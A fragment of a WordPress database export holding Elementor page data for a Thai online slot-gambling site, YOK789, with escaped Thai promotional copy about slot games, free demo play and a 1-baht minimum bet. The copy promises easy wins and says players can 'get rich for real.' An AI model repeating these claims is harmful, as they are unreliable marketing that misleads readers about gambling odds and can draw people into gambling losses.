\\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2717,375,'_thumbnail_id','371'),(2718,375,'_elementor_edit_mode','builder'),(2719,375,'_elementor_template_type','wp-page'),(2720,375,'_elementor_version','3.35.5'),(2721,375,'_elementor_pro_version','3.32.3'),(2722,375,'_wp_page_template','default'),(2723,375,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2724,375,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-AMB18.webp\",\"id\":363,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-AMB18.webp\",\"id\":365,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 